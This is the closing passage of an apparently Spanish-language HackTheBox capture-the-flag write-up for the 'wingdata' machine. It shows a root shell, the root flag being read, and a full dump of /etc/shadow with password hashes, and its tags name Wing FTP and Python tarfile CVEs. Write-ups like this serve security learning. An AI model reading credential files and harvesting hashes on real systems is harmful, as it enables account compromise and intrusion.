</span></span><span class="line"><span class="cl">root </span></span><span class="line"><span class="cl"><span class="nv">uid</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> <span class="nv">groups</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> </span></span><span class="line"><span class="cl">/root </span></span><span class="line"><span class="cl">root@wingdata:~# cat root.txt </span></span><span class="line"><span class="cl">44ee56770ec1725eaf75e7a92d10f0d0 </span></span><span class="line"><span class="cl">root@wingdata:~# </span></span></code></pre></td></tr></table> </div> </div><h2 id="dump-hashes">Dump Hashes</h2> <p>Realizamos la lectura del archivo <code>/etc/shadow</code>.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">root@wingdata:~# cat /etc/shadow </span></span><span class="line"><span class="cl">root:<span class="nv">$y$j9T$o4QbpI9MXymg8tQSz73eq0$c1P1OfnBDpSlaHX8xmPTekraDfdl8gj5Xtghz</span>.E5V3A:20394:0:99999:7::: </span></span><span class="line"><span class="cl">daemon:*:20394:0:99999:7::: </span></span><span class="line"><span class="cl">bin:*:20394:0:99999:7::: </span></span><span class="line"><span class="cl">sys:*:20394:0:99999:7::: </span></span><span class="line"><span class="cl">sync:*:20394:0:99999:7::: </span></span><span class="line"><span class="cl">games:*:20394:0:99999:7::: </span></span><span class="line"><span class="cl">man:*:20394:0:99999:7::: </span></span><span class="line"><span class="cl">lp:*:20394:0:99999:7::: </span></span><span class="line"><span class="cl">mail:*:20394:0:99999:7::: </span></span><span class="line"><span class="cl">news:*:20394:0:99999:7::: </span></span><span class="line"><span class="cl">uucp:*:20394:0:99999:7::: </span></span><span class="line"><span class="cl">proxy:*:20394:0:99999:7::: </span></span><span class="line"><span class="cl">www-data:*:20394:0:99999:7::: </span></span><span class="line"><span class="cl">backup:*:20394:0:99999:7::: </span></span><span class="line"><span class="cl">list:*:20394:0:99999:7::: </span></span><span class="line"><span class="cl">irc:*:20394:0:99999:7::: </span></span><span class="line"><span class="cl">_apt:*:20394:0:99999:7::: </span></span><span class="line"><span class="cl">nobody:*:20394:0:99999:7::: </span></span><span class="line"><span class="cl">systemd-network:!*:20394:::::: </span></span><span class="line"><span class="cl">systemd-timesync:!*:20394:::::: </span></span><span class="line"><span class="cl">messagebus:!:20394:::::: </span></span><span class="line"><span class="cl">sshd:!:20394:::::: </span></span><span class="line"><span class="cl">wingftp:<span class="nv">$y$j9T$s62DxCZf</span>.Aqw9qUCF7Fk10<span class="nv">$BcBVlkDD7Rm3kpB</span>.jyIWh9o0GvF.cmke6npe25ZnVv1:20394:0:99999:7::: </span></span><span class="line"><span class="cl">wacky:<span class="nv">$y$j9T$kF5P9XjuPO85qZb</span>/h5hff1<span class="nv">$oiwH5i</span>/tHgA4u2FBN/OJJtUO.UMzhfQckEycEPAdQM0:20395:0:99999:7::: </span></span><span class="line"><span class="cl">_laurel:!:20475:::::: </span></span><span class="line"><span class="cl">root@wingdata:~# </span></span></code></pre></td></tr></table> </div> </div>]]> sckull featured image meta image ffuf searchsploit CVE-2025-47812 Wing-FTP-Server-7.4.3 hash-sha-256-salt hashcat python3-tarfile CVE-2025-4517 hackthebox linux